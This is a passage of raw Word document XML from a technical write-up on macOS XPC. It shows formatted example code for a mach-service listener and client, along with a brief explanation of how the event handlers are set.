          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="703DAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">xpc_connection_t </w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">listener = </w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="3D1D81"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>xpc_connection_create_mach_service</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="D12F1B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>"com.apple.xpc.example"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="BB2CA2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="78492A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>XPC_CONNECTION_MACH_SERVICE_LISTENER</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="3D1D81"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>xpc_connection_set_event_handler</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>(listener, ^(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="703DAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">xpc_object_t </w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>peer) {</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="008400"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>// Connection dispatch</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="008400"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="3D1D81"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>xpc_connection_set_event_handler</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>(peer, ^(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="703DAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">xpc_object_t </w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>event) {</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="008400"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>// Message dispatch</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="008400"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="703DAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">xpc_type_t </w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">type = </w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="3D1D81"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>xpc_get_type</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>(event);</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="BB2CA2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">(type == </w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="78492A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>XPC_TYPE_DICTIONARY</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>){</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="008400"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>//Message handler</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="008400"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="3D1D81"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>xpc_connection_resume</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>(peer);</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="3D1D81"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>xpc_connection_resume</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>(listener);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00767980" w:rsidRDefault="00767980" w:rsidP="00B65EF6">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:rPr>
          <w:rFonts w:ascii="Palatino-Roman" w:hAnsi="Palatino-Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="60"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Palatino-Roman" w:hAnsi="Palatino-Roman"/>
          <w:color w:val="324863"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">xpc_connection_set_event_handler </w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Palatino-Roman" w:hAnsi="Palatino-Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t>is called again to specify</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Palatino-Roman" w:hAnsi="Palatino-Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:br/>
        <w:t>the message handlers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B65EF6" w:rsidRPr="00B65EF6" w:rsidRDefault="00B65EF6" w:rsidP="00B65EF6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="158" w:name="_Toc445313360"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Client</w:t>
      </w:r>
      <w:bookmarkEnd w:id="158"/>
    </w:p>
    <w:p w:rsidR="00B65EF6" w:rsidRDefault="00B65EF6" w:rsidP="00B65EF6">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="703DAA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">xpc_connection_t </w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">client = </w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="3D1D81"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>xpc_connection_create_mach_service</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="D12F1B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>"com.apple.xpc.example"</w:t>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BB2CA2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>NULL</w:t>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272AD8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>0</w:t>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3D1D81"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>xpc_connection_set_event_handler</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>(client, ^(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="703DAA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">xpc_object_t </w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>event) {</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="008400"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>//connection err handler</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="008400"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br/>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3D1D81"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>xpc_connection_resume</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>(client);</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="703DAA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">xpc_object_t </w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">message = </w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="3D1D81"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>xpc_dictionary_create</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="BB2CA2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="BB2CA2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="272AD8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>0</w:t>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3D1D81"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>xpc_dictionary_set_double</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">(message, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="D12F1B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>"value1"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="272AD8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>1.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="703DAA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">xpc_object_t </w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">reply = </w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="3D1D81"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>xpc_connection_send_message_with_reply_sync</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65EF6">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>(client, message);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00995B76" w:rsidRDefault="00995B76" w:rsidP="00995B76">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="159" w:name="_Toc445313361"/>
      <w:r w:rsidRPr="00995B76">
        <w:t>xpc_connection_create_mach_service</w:t>
      </w:r>
      <w:bookmarkEnd w:id="159"/>
      <w:r w:rsidRPr="00B65EF6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00995B76" w:rsidRPr="00995B76" w:rsidRDefault="00995B76" w:rsidP="00B65EF6">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00995B76" w:rsidRDefault="00995B76" w:rsidP="00995B76">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="109" w:after="218"/>
        <w:rPr>
          <w:rStyle w:val="HTMLTypewriter"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLTypewriter"/>
